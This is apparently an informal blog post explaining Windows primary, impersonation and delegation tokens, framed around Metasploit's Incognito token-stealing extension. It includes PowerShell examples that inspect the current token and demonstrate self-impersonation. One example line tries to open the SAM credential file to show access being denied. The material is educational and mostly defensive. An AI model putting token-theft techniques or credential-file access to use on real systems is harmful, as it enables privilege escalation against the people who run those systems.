The Incognito

No, nope, we aren't talking about this thing here.

We are talking about a Metasploit module which looks something like this.

Well, specifically it's about what the impersonation and delegation tokens are.

Le what haters think:

Incognito is a very powerful extension which helps us steal Windows tokens and impersonate them, but have you ever thought about what these tokens actually are and why Windows uses them? Well then, I am glad that we are on the same page! And here I am making things clear for you.

So let's get started already!

When a user logs into a system, a lot of processes are created on his behalf, for instance explorer.exe, which runs the desktop (especially on Windows XP machines). So what Windows does is go ahead and give the user's process a primary token.

Some of the things the primary token contains:

SID

Groups

Privileges, and much more

SID stands for security identifier; it uniquely identifies a particular user.

Groups is self-explanatory: it's just the list of groups the user is a member of.

Privileges are the things the logged-in user is allowed to do.

And if the same user process has multiple threads, which is the most common case, then the primary token associated with the user process is shared with its threads.

OK, now what's the big deal about these primary tokens?

Well, the token acts as authorization evidence. So whenever a user process or one of its threads wants to access a resource that requires a certain level of privilege, the primary token of the user process is taken and compared against the privilege the requested resource demands. If the token has sufficient privileges, the process gains access to the resource; otherwise, no good.
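To see the three things listed above sitting in a real primary token, here is an added example (not code from the original post or from incognito) that summarises the current process token and then observes the outcome of the access check the paragraph describes. It assumes Windows PowerShell 5.1 on Windows; the privilege list comes from whoami.exe because the .NET WindowsIdentity class does not expose privileges. The two file paths at the bottom are just illustrative targets.

```powershell
# Added example: inspect the current process's primary token.
# Assumes Windows PowerShell 5.1 on Windows.

function Get-PrimaryTokenSummary {
    $id = [System.Security.Principal.WindowsIdentity]::GetCurrent()

    # Groups: the token stores SIDs; translate each one to a name where possible.
    $groups = foreach ($sid in $id.Groups) {
        try   { $name = $sid.Translate([System.Security.Principal.NTAccount]).Value }
        catch { $name = '(unresolvable)' }   # e.g. logon SIDs have no account name
        [pscustomobject]@{ Sid = $sid.Value; Name = $name }
    }

    # Privileges: 'whoami /priv /fo csv' prints "Privilege Name","Description","State".
    $privs = whoami /priv /fo csv | ConvertFrom-Csv

    [pscustomobject]@{
        User           = $id.Name
        UserSid        = $id.User.Value
        TokenLevel     = $id.ImpersonationLevel   # 'None' means this is a primary token
        Groups         = $groups
        Privileges     = $privs | Select-Object 'Privilege Name', State
        # SeImpersonatePrivilege is what impersonation of other users' tokens
        # depends on, so it is worth knowing which accounts hold it.
        CanImpersonate = [bool]($privs | Where-Object { $_.'Privilege Name' -eq 'SeImpersonatePrivilege' })
    }
}

# The "compared against the resource" step is done by the kernel against the
# object's DACL. Opening the file is the simplest way to observe the verdict
# from user mode without re-implementing the access check.
function Test-TokenAccess {
    param([Parameter(Mandatory)][string]$Path)
    try {
        $fs = [System.IO.File]::Open($Path, 'Open', 'Read', 'ReadWrite')
        $fs.Dispose()
        return 'Allowed'
    }
    catch [System.UnauthorizedAccessException] { return 'Denied' }
    catch { return "Other: $($_.Exception.GetType().Name)" }   # sharing violations etc.
}

$summary = Get-PrimaryTokenSummary
$summary | Format-List User, UserSid, TokenLevel, CanImpersonate
$summary.Groups     | Format-Table -AutoSize
$summary.Privileges | Format-Table -AutoSize

# Illustrative paths: a world-readable file and a file only SYSTEM/Administrators may open.
Test-TokenAccess -Path "$env:SystemRoot\win.ini"
Test-TokenAccess -Path "$env:SystemRoot\System32\config\SAM"
```

Run it once as a standard user and once from an elevated prompt: the SID and user name stay the same, but the group list (the Administrators group goes from a deny-only entry to an enabled one) and the privilege list change, and the second Test-TokenAccess call changes verdict with them. That difference is the whole point of the token: same user, different authorization evidence.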

So, having an idea about tokens, let's dig deeper, shall we?!

Impersonation tokens:

For instance, let's say there is an FTP server running on a system. The server process has a primary token associated with it, based on the user who ran the FTP process, and each of the server's threads (which possess the same primary token as the FTP process) is used to serve a client who connects to the server. So far everything is well and good, and here we come to the main part: when a remote user (let's say user1) logs in, the thread should be able to access all the files and folders that user1 has access to, shouldn't it?! But how will it be able to access them if it possesses the primary token of the user who ran the process? That user may or may not have that level of privilege, so the thread somehow has to take on the identity of user1 to get user1's privileges, and this is where impersonation of tokens comes into play.

The FTP process thread goes ahead and creates an impersonation token for user1, and using this impersonation token the thread will be able to access the things user1 would actually be able to access. When user1 is done with the requests and logs off, the thread discards the impersonation token and goes back to its own primary token.

So in a nutshell, an impersonation token is a mechanism by which a process or a thread can temporarily assume the identity of some other user.

Levels of impersonation tokens:

1) Impersonation:

Well, as we have already seen, this lets the server act on behalf of the client who authenticates to it, but only on the local machine on which the server is running.

2) Delegation:

Here the impersonation can even extend to remote systems.
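The FTP story above can be watched happening on a single thread. The following is an added example (not from the original post and not incognito's code): the thread impersonates its own identity, so nothing is gained or elevated, but the token it carries switches from the primary token to an impersonation token and, after Undo(), back again. It assumes Windows PowerShell 5.1 (.NET Framework), where WindowsIdentity.Impersonate() exists; PowerShell 7 dropped that method in favour of WindowsIdentity.RunImpersonated().

```powershell
# Added example: a thread moving from its primary token to an impersonation
# token and back. Assumes Windows PowerShell 5.1 on Windows.

function Get-ThreadTokenLevel {
    # GetCurrent() returns the thread token if one is set, else the process token.
    # A primary token reports 'None'; an impersonation token reports one of
    # Anonymous, Identification, Impersonation or Delegation. The post's two
    # levels are the last two: Impersonation is local-only, Delegation can be
    # forwarded to remote systems.
    [System.Security.Principal.WindowsIdentity]::GetCurrent().ImpersonationLevel
}

function Show-ImpersonationRoundTrip {
    $before = Get-ThreadTokenLevel            # expected: None (primary token)

    $self = [System.Security.Principal.WindowsIdentity]::GetCurrent()
    $ctx  = $self.Impersonate()               # thread now carries an impersonation token
    try {
        $during = Get-ThreadTokenLevel        # expected: Impersonation
    }
    finally {
        $ctx.Undo()                           # revert, as the FTP thread does when user1 logs off
    }
    $after = Get-ThreadTokenLevel             # expected: None again

    [pscustomobject]@{ Before = $before; During = $during; After = $after }
}

Show-ImpersonationRoundTrip
```

The try/finally is the part worth copying: a server thread that forgets to revert keeps serving later clients with the previous client's identity, which is exactly the kind of lingering token a tool like incognito goes looking for. A thread that reaches Delegation level is the more sensitive case, since that token can be presented to other machines, so services should request only the level they need.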


That's all there is to it, good bye and imma see you again ;)
